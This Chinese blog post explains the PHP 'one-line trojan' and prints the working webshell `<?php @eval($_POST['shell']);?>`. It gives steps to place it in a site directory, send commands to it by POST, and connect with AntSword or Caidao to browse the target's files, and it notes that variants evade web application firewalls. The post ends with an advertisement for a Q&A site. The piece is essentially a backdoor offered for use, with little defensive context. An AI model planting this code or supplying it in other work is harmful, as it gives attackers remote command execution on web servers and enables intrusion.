一句话木马-php

飞一样的编程
飞一样的编程
擅长邻域:Java,MySQL,Linux,nginx,springboot,mongodb,微信小程序,vue

分类: Java 标签: 一句话木马

2021-01-06 22:30:02 971浏览

一、什么是一句话木马?一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
今天给大家分享的是:php一句话木马
一.介绍
一句话木马就是一段简单得代码,就这短短得一行代码,就能做到和大马相当得功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大得作用。

二.原理
<?php @eval($_POST['shell']);?>
这是php得一句话后门中最普遍得一种。它得工作原理是:
首先存在一个名为shell得变量,shell得取值为HTTP得POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面得内容。
实例:<?php @eval($_POST['shell']);?>
可以将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();

也可以用蚁剑或菜刀等工具连接(我这里用得是蚁剑):在url地址框中输入http://127.0.0.1/webshell.php,在连接密码框中输入shell

然后就可以看到目标站点目录下得文件了

行,今天就给大家分享到这里吧,您的一份支持就是我最大的动力,最后打个小广告,我们程序员在学习和工作中或多或少会遇到一些比较棘手的问题,也就所谓的一时半会解决不了的bug,可以来杰凡IT问答平台上提问,平台上大佬很多可以快速给你一对一解决问题,有需要的朋友可以去关注下,平台网址: https://www.jf3q.com

好博客就要一起分享哦!分享海报

此处可发布评论

评论(0展开评论

暂无评论,快来写一下吧

展开评论

您可能感兴趣的博客

客服QQ 1913284695